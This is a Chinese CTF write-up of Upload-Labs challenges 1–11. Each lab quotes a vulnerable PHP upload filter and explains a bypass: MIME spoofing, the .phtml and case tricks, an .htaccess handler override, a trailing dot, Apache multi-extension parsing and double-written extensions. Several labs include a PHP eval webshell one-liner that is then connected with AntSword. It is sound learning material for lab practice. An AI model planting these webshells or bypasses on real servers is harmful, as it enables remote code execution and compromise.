当前位置: 首页 > news >正文

Upload-Labs-Linux1学习笔迹 (图文介绍)

lab 1

前端绕过jpg,后端改php后缀,通过蚁剑连接,在根目录下找到flag,

flag{71dc5328-c145-4fbf-a987-4dfb4c1dacd1}

//写以下文件a.jpgGIF89
<?php @eval($_POST['cmd']); ?>

labs 2

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {//检查提交if (file_exists(UPLOAD_PATH)) { //文件是否存在if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {$temp_file = $_FILES['upload_file']['tmp_name'];//路径中文件名分离$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错!';}} else {$msg = '文件类型不正确,请重新上传!';}} else {$msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';}
}

观察代码,同样没对图片进行检查,只对文件后缀名进行了前端验证(一句话木马,本篇通用)

//写以下文件a.jpgGIF89
<?php @eval($_POST['cmd']); ?>

修改文件jpg后缀为.php

打开图片链接

蚁剑连接

labs3

观察源码,对文件进行了些过滤,但是,这道图题还无需如此复杂,我们还是按照前两道题方式,上传文件,在burp中改名为phtml文件名后缀名,当然这种文件后缀名同样的可以被apache解析

//写以下文件a.jpgGIF89
<?php @eval($_POST['cmd']); ?>
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array('.asp','.aspx','.php','.jsp');//黑名单$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//删除文件名末尾的点$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //转换为小写$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //收尾去空if(!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            if (move_uploaded_file($temp_file,$img_path)) {$is_upload = true;} else {$msg = '上传出错!';}} else {$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';}
}

连接成功!

labs4

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//删除文件名末尾的点$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //转换为小写$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //收尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.$file_name;if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错!';}} else {$msg = '此文件不允许上传!';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';}
}

观察源代码,首先是黑名单$deny_ext,基本上格式都给禁了,删除了文件末尾的点,以及空格,但是尝试的时候,他并没有在前端对数据进行验证,所以,我们通过 .htacsess文件,指定apache将某一个文件去解析为php执行

.htaccess文件<FilesMatch "shell.jpg">
SetHandler application/x-httpd-php
</FilesMatch>shell.jpg文件<?php @eval(@_POST['cmd']); ?>

成功拿到shell

labs5

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//删除文件名末尾的点$file_ext = strrchr($file_name, '.');$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错!';}} else {$msg = '此文件类型不允许上传!';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';}
}

观察代码,主要有哪些呢,首先,黑名单,两次去空格(这里就有思路了,Linux无法识别空格好像,我有点忘记了,有问题请纠正!!,我想的是上传 a.php 点 (空格)点,但是我想错了哈哈,在这个代码里面,他识别的最后一个点之前的东西都被当做文件名给除掉了,最终我上传a.php. . 最后变成了 e7d95617-19a9-4dba-86ae-20455d4a900e.node5.buuoj.cn:81/upload/202411040629294443.)

继续看代码,当他分理处文件名之后,通过随机数rand赋值,构成了新的文件名,所以,我好像不太有办法了,呜呜呜,看了下提示

似乎是想告诉我们,有哪些没被禁用的,大小写!!!,所以尝试构建一句话木马

b.php
GIF89
<?php @eval($_POST['b']); ?>

上传文件名后缀为.Php

上传成功

打开蚁剑连接

labs6?

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");$file_name = $_FILES['upload_file']['name'];$file_name = deldot($file_name);//删除文件名末尾的点$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //转换为小写$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATAif (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;if (move_uploaded_file($temp_file,$img_path)) {$is_upload = true;} else {$msg = '上传出错!';}} else {$msg = '此文件不允许上传';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';}
}

继续审计,这一关新增了一个srtolower函数,将文件名改为大写,所以大小写就不能使用了,黑名单,文件去点,加上文件后缀截取,随机赋值

暂略

labs7

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //转换为小写$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.$file_name;if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错!';}} else {$msg = '此文件类型不允许上传!';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';}
}

这道题的漏洞很明显,不如上一关,黑名单,去空格,文件后缀名,大小写,但是没有去点 

所以上传b.php.

GIF89
<?php @eval($_POST['b']); ?>

上传成功,蚁剑连接

labs8?

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//删除文件名末尾的点$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //转换为小写$file_ext = trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错!';}} else {$msg = '此文件类型不允许上传!';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';}
}

代码审计。老演员了都,黑名单,分离文件名,去点,转小写,随机赋值,但是这道题目,相比前面少了这个$DATA,????

labs9

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//删除文件名末尾的点$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //转换为小写$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.$file_name;if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错!';}} else {$msg = '此文件类型不允许上传!';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';}
}

看着不难,我想,apache漏洞解决问题不大。

apache解析漏洞,一个文件名为test.x1.x2.x3的文件,apache会从x3的位置开始尝试解析,如果x3不属于apache能够解析的扩展名,那么apache会尝试去解析x2,直到能够解析到能够解析的为止,否则就会报错

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//删除文件名末尾的点$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //转换为小写$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.$file_name;if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错!';}} else {$msg = '此文件类型不允许上传!';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';}
}

连接成功

labs10

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_name = str_ireplace($deny_ext,"", $file_name);$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.$file_name;        if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错!';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';}
}

这关代码明显少了不少,难道是....短小精悍(狗头) 看代码,黑名单,去空格,这里多了个新的函数

$file_name = str_ireplace($deny_ext,"", $file_name);

这段代码其实不难理解,首先str_irepace类似一个匹配函数,$deny_ext是作为搜寻的关键词,中间的" "是空字符串,也就是说,这串代码,会在$file_name这个字符串中搜索包含有$deny_ext的部分,如果有,就给替换为空字符,其他的,变化不大

方法1,匹配模式

双写绕过

str_irepace似乎只匹配一次,只需要对文件后缀名进行双写就好.pphphp,有点类似正则匹配的懒惰模式

最后过滤变成
cffad873-dcfb-45b2-99a1-a823e09ec071.node5.buuoj.cn:81/upload/b.php

蚁剑连接 ok

方法2:文件名可控

$img_path = UPLOAD_PATH.'/'.$file_name;

这个函数他的文件名是自定义的,那么,apache解析优先级php>html  但是又要最后一个后缀名 为jpg,那么构造 b.jpg.php.jpg

 

cceb43ae-5100-48df-aff8-e64affbed528.node5.buuoj.cn:81/upload/b.jpg.php.jpg得到

蚁剑连接

完全ok

labs11

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){$ext_arr = array('jpg','png','gif');$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);if(in_array($file_ext,$ext_arr)){$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;if(move_uploaded_file($temp_file,$img_path)){$is_upload = true;} else {$msg = '上传出错!';}} else{$msg = "只允许上传.jpg|.png|.gif类型文件!";}
}

观察源代码,最大的不同是由黑名单变成了白名单,这道题,尝试%00截断,好像不行,


http://www.mrgr.cn/news/74959.html

相关文章:

  • 探索美赛:从准备到挑战的详细指南
  • 视频孪生技术在金融银行网点场景中的应用价值
  • 为什么卷积现在不火了:CNN研究热度降温的深层原因分析
  • 明日周刊-第27期
  • docker save 和 docker load介绍
  • L2 正则化
  • 知识图谱6:neo4j查询语句
  • vue2在el-dialog打开的时候使该el-dialog中的某个输入框获得焦点方法总结
  • Python自动化小技巧24——实现自动化输出模板表格报告
  • A3超级计算机虚拟机,为大型语言模型LLM和AIGC提供强大算力支持
  • 工化企业内部能源能耗过大 落实能源管理
  • 【机器学习】特征工程、降维与超参数调优:提升机器学习模型表现的三大核心技术
  • 华为HCIP-openEuler考试内容大纲:备考必看!
  • 【c++丨STL】list的使用
  • 引入第三方jar包部署服务器后找不到jar处理方法
  • 连接实验室服务器并创建虚拟环境,从本地上传文件到linux服务器,使用requirement.txt安装环境需要的依赖的方法及下载缓慢的解决方法(Linux)
  • 【golang-技巧】- 定时任务 - cron
  • 启扬RK3588核心板,助力园区管理智能化升级
  • Linux基础—ssh和nfs
  • Java面向对象编程进阶之包装类
  • ue5入门教程:EventGraph
  • 期权懂|个股期权常见的风险有哪些你知道吗?
  • 企业软文推广实战技巧:如何精准触达并促成转化?
  • 基于PLC的运料小车控制系统设计(论文+仿真)
  • Openlayers中的动画
  • 企业远程控制办公方案要考虑哪些问题?私有化部署成本高不高?